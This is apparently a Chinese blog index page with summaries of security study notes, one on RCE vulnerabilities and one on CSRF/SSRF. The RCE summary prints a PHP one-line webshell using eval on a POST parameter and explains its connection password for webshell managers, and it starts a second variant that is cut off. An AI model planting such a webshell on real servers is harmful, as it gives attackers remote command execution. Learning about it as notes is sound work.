会员
周边
捐助
新闻
博问
闪存
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
简洁模式
...
退出登录
注册
登录
neinei0412
导航
博客园
首页
新随笔
联系
订阅
管理
公告
2023年7月25日
rce漏洞学习
摘要: rce漏洞:利用代码或者命令去执行 常见的一句话木马: 1、普通一句话: 1 2 3 <?php @eval($_POST[123456]); ?> *post后面中括号里面的内容是使用菜刀或蚁剑连接时的密码 2、防爆破一句话: 1 2 3 4 <?php substr(md5($_REQUEST[
阅读全文
posted @ 2023-07-25 21:04 neinei0412
阅读(85)
评论(0)
推荐(0)
编辑
csrf&ssrf
摘要: csrf:是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并运行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去运行。这利用了web中用户身份验证的一个漏洞:简单的身份验证只能保证请求发自某个用户的浏览
阅读全文
posted @ 2023-07-25 01:48 neinei0412
阅读(34)
评论(0)
推荐(0)
编辑